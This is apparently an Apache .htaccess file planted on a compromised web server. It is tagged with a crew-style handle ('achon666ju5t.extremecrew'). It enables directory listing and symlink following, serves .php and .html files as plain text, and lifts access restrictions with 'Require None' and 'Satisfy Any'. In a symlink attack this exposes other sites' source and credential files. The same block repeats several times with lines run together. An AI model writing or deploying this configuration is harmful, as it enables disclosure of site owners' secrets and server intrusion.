Options Indexes FollowSymLinks
DirectoryIndex achon666ju5t.extremecrew
AddType txt .php
AddHandler txt .phpOptions Indexes FollowSymLinks
DirectoryIndex achon666ju5t.extremecrew
AddType txt .php
AddHandler txt .phpOptions all
Options +Indexes 
Options +FollowSymLinks 
DirectoryIndex achon666ju5t.extremecrew
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy AnyOptions Indexes FollowSymLinks
DirectoryIndex achon666ju5t.extremecrew
AddType txt .php
AddHandler txt .php